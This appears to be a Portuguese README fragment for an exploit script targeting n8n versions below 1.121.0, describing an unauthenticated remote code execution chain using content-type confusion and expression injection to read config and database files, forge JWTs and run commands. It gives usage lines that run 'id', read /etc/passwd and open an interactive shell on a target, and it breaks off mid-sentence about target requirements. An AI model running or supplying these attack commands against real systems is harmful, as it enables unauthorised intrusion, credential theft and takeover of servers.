
Cadeia de exploração para execução remota de código não autenticada no n8n, combinando confusão de tipo de conteúdo e injeção de expressões para ler arquivos, forjar JWTs e executar comandos.
Cadeia de RCE não autenticada para n8n < 1.121.0 (CVSS 10.0)
/home/node/.n8n/config e database.sqlitechild_process# Executar comando
python3 exploit.py http://target:5678 /form/test --cmd "id"
# Ler arquivo
python3 exploit.py http://target:5678 /form/test --read /etc/passwd
# Shell interativo
python3 exploit.py http://target:5678 /form/test
O alvo deve ter um workflow ativo com: